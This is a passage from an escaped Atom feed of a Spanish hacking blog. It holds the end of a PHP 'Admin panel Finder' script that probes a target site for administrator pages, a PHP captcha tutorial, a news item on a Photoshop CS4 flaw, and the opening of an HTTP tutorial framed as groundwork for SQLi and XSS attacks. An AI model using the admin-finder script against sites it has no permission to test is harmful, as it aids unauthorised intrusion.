black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;foreach($array as $valor){&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp; $Find= @"http://".$target."/".$valor;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp; $Web = @fopen($Find, "r");&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp; if($Web){&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;echo " &amp;lt;font color=red&amp;gt;";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo "Si - ".$Find."n";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;echo "&amp;nbsp; -&amp;nbsp; ";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;echo "&amp;lt;a href =$Find&amp;gt;Visit" ;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;echo "&amp;lt;/a&amp;gt;";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;echo "&amp;lt;br&amp;gt;";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;echo "&amp;lt;/font&amp;gt;";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp; }else{&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo "No - ".$Find."n";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;echo "&amp;lt;br&amp;gt;";&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&amp;nbsp; @fclose($Web);&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;}&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;?&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="background-color: white; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Estilos.css&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black; text-align: left;"&gt;&lt;b&gt;&lt;span style="background-color: #444444;"&gt;c {&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;color:#FF0000;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-size:30px;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;t {&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;color:#000000;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-size:25px;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-family:verdana;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-weight:bold;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;in {&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;color:#FF0000;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-size:25px;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-family:verdana;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-weight:bold;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;letter-spacing:-6px;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;.botonsubmit {&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;color:#ff0000;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;background-color:#000000;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;border:1px solid;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;font-family:comic sans ms;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;}&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;Ya saben cualquier duda, consulten al mail del blog.&lt;br /&gt;Muchas gracias a foro.elhacker.net (excelentes programadores) y a Shell Root!&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-3909447843389121519?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/3909447843389121519/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/admin-panel-finder.html#comment-form' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3909447843389121519'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3909447843389121519'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/admin-panel-finder.html' title='Admin panel Finder'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-1420989164591822396</id><published>2010-07-20T20:51:00.000-07:00</published><updated>2010-07-24T12:08:19.094-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='Captcha'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Captcha en php</title><content type='html'>Hola, en esta oportunidad, les voy a dejar el code de un captcha hecho en php. &lt;br /&gt;&lt;br /&gt;Primero:&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;¿Que es un captcha?&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Captcha, es el acronimo de Prueba de Turing publica y automatica para diferenciar maquinas de humanos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Se trata de una prueba desafio-respuesta utilizada en compuacion para determianr cuando un usuario es o no humano.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La tipica prueba consiste en que el usuario introduzca un conjunto de caracteres que se muestran en una imagen distorsionada que aparece en pantalla.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Se supone que una maquina no es capaz de comprender e introducir la secuencia de forma correcta.&lt;/div&gt;&lt;br /&gt;Bueno,el captcha consta de 3 archivos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.venezuela.net.ve/portal/images/stories/captcha3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="261" src="http://www.venezuela.net.ve/portal/images/stories/captcha3.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;-index.html&lt;/div&gt;&lt;div style="color: red;"&gt;-captcha.php&lt;/div&gt;&lt;div style="color: red;"&gt;-verifi.php&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;index.html&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;html&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;head&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;title&amp;gt;Verificion de captcha:&amp;lt;/title&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;/head&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;body&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;center&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;img src="captcha.php"&amp;gt;&amp;lt;br&amp;gt;&amp;lt;/img&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;form method="post" action="verifi.php"&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;input type="text" name="verificar"&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;/center&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;/body&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;/html&amp;gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;captcha.php&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;?php&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$ancho=100;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$alto=30;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$imagen=imagecreate($ancho,$alto);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$amarillo=Imagecolorallocate($imagen,255,255,0);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;imagefill($imagen,0,0,$amarillo);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$rojo=Imagecolorallocate($imagen,44,44,99);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$la=rand(1000000,9999999);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;session_start();&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$_SESSION['numero'] = $la;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;ImageString($imagen,5,25,5,$la,$rojo);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;for($c=0;$c&amp;lt;=5;$c++)&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;{&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$x1=rand(0,$ancho);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$y1=rand(0,$alto);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$x2=rand(0,$ancho);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;$y2=rand(0,$alto);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;ImageLine($imagen,$x1,$y1,$x2,$y2,$rojo);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;}&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;Header ("Content-type: image/jpeg");&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;ImageJPEG ($imagen);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;ImageDestroy($imagen);&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;?&amp;gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;verifi.php&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;?&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;session_start();&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;?&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;html&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;head&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;title&amp;gt; g t Comprobar verificacion &amp;lt;/title&amp;amp; g t&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;/head&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;body&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;?&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;if($_SESSION['numero'] ==$_REQUEST['verificar'])&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;echo "Captcha correcto";&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;else&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;echo "Captcha Incorrecto";&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;?&amp;gt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;/body&amp;lt;&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&amp;lt;/html&amp;gt;&lt;/div&gt;&lt;br /&gt;Saludos &lt;b style="color: red;"&gt;Dr [F]&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-1420989164591822396?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/1420989164591822396/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/captcha-en-php.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1420989164591822396'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1420989164591822396'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/captcha-en-php.html' title='Captcha en php'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-2032387143566368093</id><published>2010-07-19T11:05:00.000-07:00</published><updated>2010-07-20T21:21:00.322-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><category scheme='http://www.blogger.com/atom/ns#' term='Bugs'/><title type='text'>Vulnerabilidad crítica en Photoshop CS4</title><content type='html'>&lt;div style="text-align: justify;"&gt;Adobe soluciona lanza una actualización de seguridad que podría permitir  la perdida del control del sistema afectado.&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img838.imageshack.us/img838/2190/adobephotoshopcs41.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="283" src="http://img838.imageshack.us/img838/2190/adobephotoshopcs41.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Adobe Systems ha publicado un nuevo parche con el que solucionar varias  vulnerabilidades críticas en Photoshop CS4 11.0.1 para Windows y Mac,  así como en las versiones anteriores de este conocido editor de  imágenes.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Se trata de una vulnerabilidad que permite a un  atacante tomar el control del sistema por medio de archivos maliciosos  usados para instalar pinceles y degradados (.ASL, .ABR o .GDR).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Adobe  recomienda a todos los usuarios de Photoshop CS4 se descarguen el  parche de seguridad Photoshop CS4 11.0.2 a la mayor brevedad.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Parche:&lt;a class="bbc_link new_win" href="http://www.adobe.com/support/security/bulletins/apsb10-13.html" target="_blank"&gt;  http://www.adobe.com/support/security/bulletins/apsb10-13.html&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Fuente:  DesarrolloWeb&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-2032387143566368093?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/2032387143566368093/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/vulnerabilidad-critica-en-photoshop-cs4.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2032387143566368093'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2032387143566368093'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/vulnerabilidad-critica-en-photoshop-cs4.html' title='Vulnerabilidad crítica en Photoshop CS4'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-74961574700351298</id><published>2010-07-18T22:03:00.000-07:00</published><updated>2010-07-25T23:02:56.069-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Http'/><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='Protocolos'/><title type='text'>Protocolo HTTP</title><content type='html'>Bueno gente, aca les traigo un tutorial del funcionamiento "basico" del protocolo http, el entender&lt;br /&gt;este protocolo nos puede servir para ataques de tipo HEADER HTTP, Sqli, XSS, bueno basicamente&lt;br /&gt;casi todos o todos los ataques del tipo de vulnerabilidad a nivel web.&lt;br /&gt;comenzemos con lo basico.&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;0x001 --&amp;gt; Conceptos basicos&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;&lt;b&gt;0x002 --&amp;gt; Funcionamiento del protocolo HTTP&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;&lt;b&gt;0X003 --&amp;gt; Envio de datos (Metodos)&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;&lt;b&gt;0x004 --&amp;gt; Solicitudes&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;&lt;b&gt;0x005 --&amp;gt; Respuestas&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Antes de empezar considero correcto dejar el archivo con el contenido del manual por si a alguno le resulta mas comodo el formato de este es .txt&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.megaupload.com/?d=RL30Q8LU"&gt;http://www.megaupload.com/?d=RL30Q8LU&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;0x001:&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Bueno, creo que para no liarnos con todo esto, primero debere de despejar algunas dudas que surgen&lt;/div&gt;&lt;div style="text-align: justify;"&gt;en algunas oportunidades para la mejor comprension del manual.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Url:&lt;/span&gt; Una url es una direccion (web) que permite el acceso a paginas, archivos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ejemplo: www.foro.portalhacker.net/index.php&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Diferencia entre url y uri:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Un uri (uniform resource identifier) se diferencia de una url en que este permite incluir en la direccion una subdireccion, esto sera mejor con un ejemplo:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: justify;"&gt;estructura de un uri:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;http://www.lalala.com/index.php?pagina=2#inicio&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Cabecera o Header:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Una cabecera, se refiere a una informacion suplementaria situada al principio de un bloque de informacion que va a ser almacenada o transimitada y que contiene informacion necesaria para el correcto funcionamiento del bloque de datos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En transmision de informacion de informacion los datos que siguen a la cabecera se denominan cuerpo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;CGI: &lt;/span&gt;Tecnologia de la WWW permite a un cliente (navegador) solicitar datos de un programa 